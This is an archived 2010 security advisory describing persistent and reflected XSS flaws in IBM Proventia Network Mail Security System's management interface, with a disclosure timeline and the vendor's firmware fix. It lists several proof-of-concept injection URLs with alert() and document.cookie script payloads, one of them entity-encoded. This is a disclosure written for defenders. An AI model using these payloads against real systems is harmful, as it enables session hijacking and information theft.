Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24731
HistorySep 14, 2010 - 12:00 a.m.

MVSA-10-007 / CVE-2010-0152 - IBM Proventia Mail Security System - Multiple persistent and reflected XSS vulnerabilities

2010-09-1400:00:00
vulners.com
32

Security Advisory: MVSA-10-007 / CVE-2010-0152
Vendor: IBM
Products: Proventia Network Mail Security System
Vulnerabilities: Multiple Cross-Site Scripting (XSS)
Risk: High
Attack Vector: From Remote
Authentication: Not Required/Required
Reference: http://www.ventuneac.net/security-advisories/MVSA-10-007

Description

Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6 and 2.5) is vulnerable to multiple persistent and reflected XSS attacks. When exploited by an external/internal attacker, such identified vulnerabilities could lead to Session Hijack, Information Disclosure, force installation of malicious file or Trojan on users' PCs, etc.

A persistent XSS vulnerability can be exploited by an external unauthenticated attacker to inject malicious scripting code which is persistently stored. When the system is accessed by authorised users, such malicious code could be used to severely compromise the security of the appliance.

A persistent XSS vulnerability identified in saved search filters (Mail Security->Email Browser) allows an internal authenticated attacker to inject malicious scripting code.

Multiple reflected XSS vulnerabilities can be exploited by manipulating parameters of pvm_messagestore.php resource.

url_placeholder/pvm_messagestore.php?msgid=&sender=&rcpt=&subject=&meta=&mailsize=&folder=allfolders&date1=<script>alert('xss')</script>&date2=&s=mails&favname=

Reflected XSS vulnerabilities can be exploited by manipulating parameters of the following resources:

* userfilter parameter of pvm_user_management.php resource.

    url_placeholder/pvm_user_management.php?userfilter=1&#37;22+onblur&#37;3D&#37;22alert&#37;28&#37;27xss&#37;27&#37;29

* ping parameter of sys_tools.php

    url_placeholder/sys_tools.php?form=ping&amp;page=sys_ping.php&amp;ping=&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

* action parameter of pvm_cert_commaction.php resource

    url_placeholder/pvm_cert_commaction.php?ajax=1&amp;action=&gt;&quot;&#39;&gt;&lt;img&#37;20src&#37;3D&#37;26&#37;23x6a;&#37;26&#37;23x61;&#37;26&#37;23x76;               &#37;26&#37;23x61;&#37;26&#37;23x73;&#37;26&#37;23x63;&#37;26&#37;23x72;&#37;26&#37;23x69;&#37;26&#37;23x70;&#37;26&#37;23x74;&#37;26&#37;23x3a;alert&#40;&#37;26quot;XSS&#37;26quot;&#41;&gt;

* action parameter of pvm_cert_serveraction.php resource.

    url_placeholder/pvm_cert_serveraction.php ?ajax=1&amp;action=&gt;&quot;&#39;&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

* action parameter of pvm_smtpstore.php resource.

    url_placeholder/pvm_smtpstore.php?id=frozen&amp;action=&quot;&gt;&lt;script&gt;alert&#40;&quot;XSS&quot;&#41;&lt;/script&gt;

* l parameter  of /sla/index.php  resource

    url_placeholder/sla/index.php?l=&quot;&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

Affected Versions

IBM Proventia Network Mail Security System - virtual appliance (firmware 1.6)
IBM Proventia Network Mail Security System - virtual appliance (firmware 2.5)

Mitigation

Vendor recommends upgrading to PNMSS firmware 2.5.0.2 or later.
Alternatively, please contact IBM for technical support.

Disclosure Timeline

2009, November 07: Vulnerabilities discovered and documented
2009, November 08: Notification sent to IBM
2009, November 09: IBM acknowledges receiving the report
2010, March: IBM releases PNMSS Firmware 2.5.0.2 correcting the reported issues
2010, September 12: MVSA-10-007 advisory published.

Credits

Dr. Marian Ventuneac
http://ventuneac.net

Related for SECURITYVULNS:DOC:24731